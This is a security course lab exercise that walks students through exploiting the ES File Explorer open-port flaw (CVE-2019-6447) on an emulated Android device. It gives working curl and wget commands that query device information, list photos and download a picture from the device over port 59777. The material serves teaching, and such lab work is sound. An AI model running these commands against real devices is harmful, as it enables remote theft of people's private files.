Proj 9: ES Explorer Command Injection (10 pts)

What You Need for This Project

An Android emulator or device to test the app on
Android Debug Bridge
You should have that already set up from previous projects

Background

ES File Explorer is very popular, with over 100 million downloads. However, it exposes your phone to remote control over the network.

Here is the writeup describing the vulnerability: ES File Explorer Open Port Vulnerability - CVE-2019-6447

It's very easy to see and exploit.

This was a zero-day exploit when it was dropped on Twitter on Jan. 16, 2019:

Start VMware

Always launch your Kali virtual machine before you start Genymotion, to avoid VirtualBox networking errors.

Installing the App

It was reported that the app was patched on Jan. 18, 2019, so download an archived vulnerable version here.

Drag the APK file onto your Genymotion device and drop it there. Approve the application installation.

Launching the App

Launch the app.

Click Agree, ALLOW, and "START NOW", as shown below.

You see information about your files, as shown below.

Connecting to your Android Device with ADB

On Kali, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:

adb connect 172.16.123.154 adb devices -l

You should see your Genymotion device in the "List of devices attached", as shown below.

Viewing the Listening Process

On Kali, in a Terminal, execute these commands:

adb shell netstat -pant | grep LISTEN exit

You see a process named "com.estrongs.android.pop" listening on port 59777,

The Attack

On Kali, in a Terminal, execute this command, replacing the IP address with the IP address of your Genymotion Android device:

curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://172.16.123.154:59777

You see information about your phone, as shown below.

Saving a Screen Image

Make sure you can see ftpRoot in the output, as shown above.

Save a full-desktop image. On a Mac, press Shift+Commmand+3. On a PC, press Shift+PrntScrn and paste into Paint.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Save the image with the filename "YOUR NAME Proj 9", replacing "YOUR NAME" with your real name.

Optional: Steal a Photo

If you have a webcam, you can do this.

In Genymotion, on the right side, click the Webcam icon, colored pink in the image below.

Adjust the camera to access your host system's webcam, as shown below.

On your Android device, open the Camera app and take a photo, as shown below.

On Kali, in a Terminal, execute this command, replacing the IP address with the IP address of your Genymotion Android device:

curl --header "Content-Type: application/json" --request POST --data '{"command":"listPics"}' http://172.16.123.154:59777

Find the path to your image in the output, as shown below.

On Kali, in a Terminal, execute this command, replacing the IP address and path to the correct values for your system:

wget http://172.16.123.154:59777//storage/emulated/0/DCIM/Camera/IMG_20190116_141301.jpg

The file downloads, as shown below.

On Kali, in a Terminal, execute this command to view the file, replacing the filename with the correct name on your system:

xdg-open IMG_20190116_141301.jpg

The file appears, as shown below.

Testing Security Apps

A student asked what defense will stop this attack. I can't find any app that does it. You could, of course, configure iptables from the command-line, but I haven't found any app that works.

Here's what I tried, and none of them stopped the attack, as of Jan 17, 2019.

Norton Mobile Security
Kaspersky Mobile Antivirus
Kaspersky Smart Home & IoT Scanner
Network Connections
FREE VPN
NetGuard -- crashed Genymotion
AFWall+ -- crashed Genymotion
Malwarebytes Security

Turning in your Project

Email the image to to cnit.128sam@gmail.com with the subject line: Proj 9 from YOUR NAME

Posted 1-16-19 by Sam Bowne
Testing security apps added 1-17-19
Updated 1-23-19 because the app was reportedly patched